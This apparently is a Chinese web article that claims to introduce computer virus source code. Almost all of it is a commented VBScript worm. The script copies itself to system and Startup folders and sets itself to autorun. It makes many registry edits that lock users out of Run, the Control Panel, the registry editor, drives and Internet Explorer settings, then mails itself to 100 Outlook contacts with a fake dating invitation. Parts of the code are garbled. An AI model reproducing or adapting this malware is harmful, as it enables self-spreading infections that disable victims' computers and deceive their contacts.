電腦病毒原始碼介紹

　　電腦中了病毒想從它的原始碼入手怎麼辦呢!有小編在，下面由小編給你做出詳細的!希望對你有幫助!

　　：

　　電腦病毒原始碼一：

　　on error resume next

　　set fs=createobject***"ing.filesystemobject" '建立一個能與作業系統溝通的物件,再利用該物件的各種方法對登錄檔進行操作

　　set dir1=fs.getspecialfolder***0*** '獲取windows/winnt資料夾位置

　　set dir2=fs.getspecialfolder***1*** '獲取system32/system資料夾位置

　　set so=createobject***"ing.filesystemobject"

　　dim r '定義一個變數

　　set r=createobject***"w.shell"

　　so.getfile***w.fullname***.copy***dir1&"\win32system.vbs" '複製病毒副本到windows/winnt資料夾位置

　　so.getfile***w.fullname***.copy***dir2&"\win32system.vbs" '複製病毒副本到system32/system資料夾位置

　　so.getfile***w.fullname***.copy***dir1&"\start menu\programs\啟動\win32system.vbs" '複製病毒副本到start menu啟動選單

　　'下面是對登錄檔的惡意修改和簡單的依靠oe傳播

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改登錄檔，禁止“執行”選單

　　r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改登錄檔，禁止“關閉”選單

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改登錄檔，隱藏所有邏輯碟符

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改登錄檔，禁止登錄檔編輯

　　r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改登錄檔，禁止開機登錄檔掃描

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改登錄檔，禁止“登出”選單

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改登錄檔，禁止ms-dos真實模式

　　r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改登錄檔，使這個指令碼本身開機自動執行

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改登錄檔，禁止顯示桌面圖示

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改登錄檔，禁止純dos模式

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改登錄檔，禁止“工作列和開始”選單

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改登錄檔，禁止右鍵選單

　　電腦病毒原始碼二：

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword" '修改登錄檔，禁止控制面板

　　r.regwrite "hklm\software\classes\.reg\","txtfile" '修改登錄檔，禁止匯入使用.reg檔案，改為用txt檔案的關聯

　　r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","警告" '設定開機提示框標題

　　r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","您中vbs指令碼病毒了，哭吧~" '設定開機提示框文字內容

　　set ol=createobject***"outlook.application" '建立outlook檔案物件用於傳播

　　on error resume next

　　for x=1 to 100

　　set mail=ol.createitem***0***

　　mail.to=ol.getnamespace***"mapi".addresslists***1***.addressentries***x*** '用於向地址簿的前100名傳送此 vbs病毒，可以算是簡單***的蠕蟲了吧~~

　　mail.subject="今晚你來嗎?" '郵件主題

　　mail.body="朋友你好：您的朋友rose給您發來了熱情的邀請。具體情況請閱讀隨信附件，祝您好運! 同城約會網" '郵件內容

　　mail.attachments.add***dir2&"win32system.vbs"

　　mail.send

　　ol.quit

　　'下面是對internet explore 選項的惡意修改

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword" '修改登錄檔，禁止滑鼠右鍵

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword" '修改登錄檔，禁止internet選項

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword" '修改登錄檔，禁止“另存為”

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword" '修改登錄檔，禁止“檔案/開啟”選單

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword" '修改登錄檔，禁止更改高階頁設定

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword" '修改登錄檔，禁止更改臨時檔案設定

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword" '修改登錄檔，禁止更改自動配置

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword" '修改登錄檔，禁止更改主頁，即“主頁”變灰

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword" '修改登錄檔，禁止更改歷史記錄設定

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword" '修改登錄檔，禁止更改internet連線嚮導

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword" '修改登錄檔，禁止更改安全項

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword" '修改登錄檔，禁止“重置web設定”

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword" '修改登錄檔，禁止檢視原始檔

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubions",1,"reg_dword" '修改登錄檔，禁止新增離線計劃

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofilemenu",1,"reg_dword" '修改登錄檔，禁止“檔案”選單

猜你感興趣
最近瀏覽